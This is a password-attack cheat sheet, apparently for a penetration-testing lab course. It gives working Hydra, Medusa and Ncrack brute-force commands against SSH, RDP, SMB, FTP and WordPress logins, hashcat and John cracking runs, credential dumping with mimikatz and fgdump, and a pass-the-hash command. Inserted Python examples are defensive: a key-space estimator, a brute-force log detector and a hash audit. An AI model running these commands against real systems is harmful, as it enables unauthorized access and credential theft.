-
AES Decryption http://aesencryption.net/
-
Convert multiple webpages into a word list
for x in index about post contact; do
  curl -s "http://$ip/$x.html" | html2markdown | tr -s ' ' '\n' >> webapp.txt
done
-
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
-
Default Usernames and Passwords
-
Government Security - Default Logins and Passwords for Networked Devices
-
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
-
Virus.org http://www.virus.org/default-password/
-
Default Password http://www.defaultpassword.com/
-
Brute Force
-
Nmap Brute forcing Scripts https://nmap.org/nsedoc/categories/brute.html
-
Nmap Generic auto detect brute force attack:
nmap --script brute -Pn <target.com or ip>
-
MySQL nmap brute force attack:
nmap --script=mysql-brute $ip
-
-
Dictionary Files
- Word lists on Kali
cd /usr/share/wordlists
-
Key-space Brute Force
-
crunch 6 6 0123456789ABCDEF -o crunch1.txt
-
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
-
crunch 8 8 -t ,@@^^%%%
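Before launching a key-space run it is worth knowing how many candidates crunch will emit, both to judge whether a job is feasible and, from the defender's side, to estimate how long a given password policy holds up against a known guessing rate. The estimator below is an added example, not part of the cheat sheet or of crunch itself; the placeholder sizes it assumes for crunch's -t pattern characters (@ lowercase 26, , uppercase 26, % digits 10, ^ symbols 33 for crunch's default symbol set) are assumptions and can be overridden.

```python
# Added example (not from the cheat sheet or from crunch): estimate the size of a
# crunch key-space and the time to exhaust it at a given guessing rate.
from datetime import timedelta

# Assumed sizes for crunch's default -t placeholders; pass your own dict if the
# charset was changed (the symbol count in particular is an assumption).
DEFAULT_PLACEHOLDERS = {"@": 26, ",": 26, "%": 10, "^": 33}


def pattern_keyspace(pattern: str, placeholders=None) -> int:
    """Number of candidates 'crunch N N -t <pattern>' produces.
    Any character that is not a placeholder is a literal and contributes x1."""
    sizes = DEFAULT_PLACEHOLDERS if placeholders is None else placeholders
    total = 1
    for ch in pattern:
        total *= sizes.get(ch, 1)
    return total


def charset_keyspace(min_len: int, max_len: int, charset_size: int) -> int:
    """Number of candidates 'crunch <min> <max> <charset>' produces:
    the sum of charset_size**n over every length in the range."""
    if min_len < 1 or max_len < min_len or charset_size < 1:
        raise ValueError("need 1 <= min_len <= max_len and a non-empty charset")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def time_to_exhaust(keyspace: int, guesses_per_second: float) -> timedelta:
    """Wall-clock time to try every candidate at a constant guessing rate."""
    if guesses_per_second <= 0:
        raise ValueError("guessing rate must be positive")
    return timedelta(seconds=keyspace / guesses_per_second)


if __name__ == "__main__":
    # The three crunch invocations from the cheat sheet, hex / mixalpha / pattern.
    print("crunch 6 6 0123456789ABCDEF ->", charset_keyspace(6, 6, 16))
    print("crunch 4 4 mixalpha       ->", charset_keyspace(4, 4, 52))
    print("crunch 8 8 -t ,@@^^%%%    ->", pattern_keyspace(",@@^^%%%"))
    # Assumed rate of one million guesses per second, purely illustrative.
    print("pattern at 1M/s           ->", time_to_exhaust(pattern_keyspace(",@@^^%%%"), 1e6))
```

The pattern case shows why fixed-structure passwords (one capital, two letters, two symbols, three digits) are not as strong as their length suggests: the structure collapses the key-space by orders of magnitude compared with a truly random 8-character string over the same alphabet.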
-
-
Pwdump and Fgdump - Security Accounts Manager (SAM)
-
pwdump.exe - attempts to extract password hashes
fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
-
-
Windows Credential Editor (WCE)
- allows one to perform several attacks to obtain clear text
passwords and hashes. Usage:
wce -w
-
Mimikatz
- extract plaintexts passwords, hash, PIN code and kerberos
tickets from memory. mimikatz can also perform
pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz
From metasploit meterpreter (must have System level access):
meterpreter> load mimikatz
meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPasswords
-
Password Profiling
- cewl can generate a password list from a web page
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
-
Password Mutating
- John the ripper can mutate password lists
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
-
Medusa
- Medusa, initiated against an htaccess protected web
directory
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
-
Ncrack
- ncrack (from the makers of nmap) can brute force RDP
ncrack -vv --user offsec -P password-file.txt rdp://$ip
-
Hydra
-
Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
-
Hydra FTP known user and rockyou password list
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
-
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh
-
Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 $ip ssh
-
Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt
-
Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V
-
Hydra SMTP Brute Force
hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
-
Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
-
Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
-
Hydra brute force SMB user with rockyou:
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
-
Hydra brute force a Wordpress admin login
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
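Every Hydra, Medusa and Ncrack run above leaves the same footprint on the target: a burst of authentication failures from one source, often against several usernames, sometimes followed by a success. The detector below is an added example (not part of the cheat sheet or of any of those tools) that parses constructed sshd auth.log lines and flags sources exceeding a failure threshold inside a time window, noting whether a successful login followed the burst. The sample lines, the year used for the syslog timestamps and the threshold/window values are all assumptions.

```python
# Added example, not from the cheat sheet: spot password-guessing bursts in sshd logs.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not real data); addresses are documentation ranges.
SAMPLE_LOG = """\
Mar 10 09:15:01 bastion sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 50211 ssh2
Mar 10 09:15:02 bastion sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 50212 ssh2
Mar 10 09:15:02 bastion sshd[4125]: Failed password for root from 203.0.113.7 port 50213 ssh2
Mar 10 09:15:03 bastion sshd[4127]: Failed password for root from 203.0.113.7 port 50214 ssh2
Mar 10 09:15:04 bastion sshd[4129]: Failed password for invalid user offsec from 203.0.113.7 port 50215 ssh2
Mar 10 09:15:05 bastion sshd[4131]: Accepted password for root from 203.0.113.7 port 50216 ssh2
Mar 10 09:20:44 bastion sshd[4310]: Failed password for alice from 198.51.100.22 port 40122 ssh2
Mar 10 09:31:10 bastion sshd[4402]: Accepted publickey for alice from 198.51.100.22 port 40130 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X" forms.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_events(text, year=2024):
    """Return (timestamp, result, user, source_ip) tuples; syslog lines carry no year,
    so one is assumed (2024 here)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=4, window_seconds=60):
    """Map source IP -> details for every source with >= threshold failures inside
    one window; 'success_after_burst' marks the guess-then-login pattern."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        for i in range(len(fails)):
            j = i
            # Extend the window forward from failure i as far as it reaches.
            while j + 1 < len(fails) and (fails[j + 1][0] - fails[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i + 1 >= threshold:
                last_fail = fails[j][0]
                success_after = any(e[1] == "Accepted" and e[0] >= last_fail for e in evs)
                alerts[ip] = {
                    "failures": j - i + 1,
                    "users": sorted({e[2] for e in fails[i:j + 1]}),
                    "success_after_burst": success_after,
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

A single failed login from 198.51.100.22 is not reported, while 203.0.113.7 is flagged with five failures across three usernames and a password login immediately afterwards, which is the case that deserves an immediate response rather than a ticket.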
-
-
Online Password Cracking
https://crackstation.net/
http://finder.insidepro.com/
-
Hashcat
Needed to install new drivers to get my GPU cracking to work on the Kali Linux VM, and I also had to use the --force parameter.
apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
and
apt-get install pocl-opencl-icd
-
Common hashcat modes (-m):
Mode | Hash type | Category
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
Create a .hash file with all the hashes you want to crack, e.g. puthasheshere.hash:
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
-
Hashcat example cracking Linux md5crypt passwords
hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt
-
Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
Wordpress clear text: test
Hashcat example cracking a WordPress (phpass) hash stored in wphash.hash
hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt
-
Sample Hashes http://openwall.info/wiki/john/sample-hashes
-
Identify Hashes
hash-identifier
-
To crack linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
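unshadow simply joins the two files on the username and substitutes the shadow hash for the "x" placeholder; once merged, the crypt prefix of each hash tells you which algorithm protects the account, which is the same information the hashcat mode table above is keyed on. The script below is an added example (not part of the cheat sheet, John the Ripper or hashcat) that performs that merge on constructed passwd/shadow lines and then audits the result, flagging accounts still stored with legacy algorithms. The sample lines and their hash bodies are placeholders, not real credentials; the mode numbers come from the table above, and yescrypt ($y$) is marked as having no entry there rather than given an invented one.

```python
# Added example, not from the cheat sheet: an unshadow equivalent plus a hash-algorithm audit.
import re

# Constructed sample files; hash bodies are placeholders, not real hashes.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
legacy:x:1001:1001:Old service account:/home/legacy:/bin/sh
alice:x:1002:1002:Alice:/home/alice:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
SHADOW = """\
root:$6$SALTSALT$PLACEHOLDERHASHBODY:19700:0:99999:7:::
legacy:$1$SALTSALT$PLACEHOLDERHASH:19700:0:99999:7:::
alice:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASHBODY:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
"""

# Crypt prefix -> (algorithm, hashcat mode) taken from the mode table above.
CRYPT_PREFIXES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200), "$2b$": ("bcrypt", 3200), "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
}
# Algorithms worth flagging in an audit: fast, unsalted-enough-to-matter legacy schemes.
WEAK = {"md5crypt", "descrypt"}


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with the 'x' field replaced by the shadow hash, as unshadow does."""
    hashes = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:          # skip malformed lines instead of guessing
            continue
        if fields[1] == "x" and fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def classify_hash(h):
    """Identify the crypt scheme from its prefix; returns (name, hashcat_mode_or_None)."""
    if h in ("*", "!", "!!", "") or h.startswith("!"):
        return ("locked/no password", None)
    for prefix, info in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return info
    if re.fullmatch(r"[./0-9A-Za-z]{13}", h):
        return ("descrypt", None)    # traditional DES crypt (john --format=descrypt); no mode in the table above
    if h.startswith("$y$"):
        return ("yescrypt", None)    # not listed in the table above
    return ("unknown", None)


def audit(merged_lines):
    """List (user, algorithm, mode) for accounts whose hash scheme is in WEAK."""
    findings = []
    for line in merged_lines:
        user, h = line.split(":")[:2]
        name, mode = classify_hash(h)
        if name in WEAK:
            findings.append((user, name, mode))
    return findings


if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    for line in merged:
        user, h = line.split(":")[:2]
        print(f"{user:8} {classify_hash(h)}")
    print("weak:", audit(merged))
```

Run against a real merged file, the audit answers the question the cracking commands below are implicitly asking: which accounts would fall first. Those are the ones to re-hash (by forcing a password change under the current default scheme) before anyone needs to run john against them.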
-
John the Ripper - Password Hash Cracking
-
john $ip.pwdump
-
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
-
john --rules --wordlist=/usr/share/wordlists/rockyou.txt
-
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
-
JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
-
JTR forced descrypt brute force cracking (default modes, no wordlist), then show the cracked results
john --format=descrypt hash.txt
john --format=descrypt hash.txt --show
-
-
Passing the Hash in Windows
-
Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //$ip cmd
-
fcrackzip
- dictionary attack against a password-protected zip archive
fcrackzip -v -b -D -p rockyou.txt -u ./backup.zip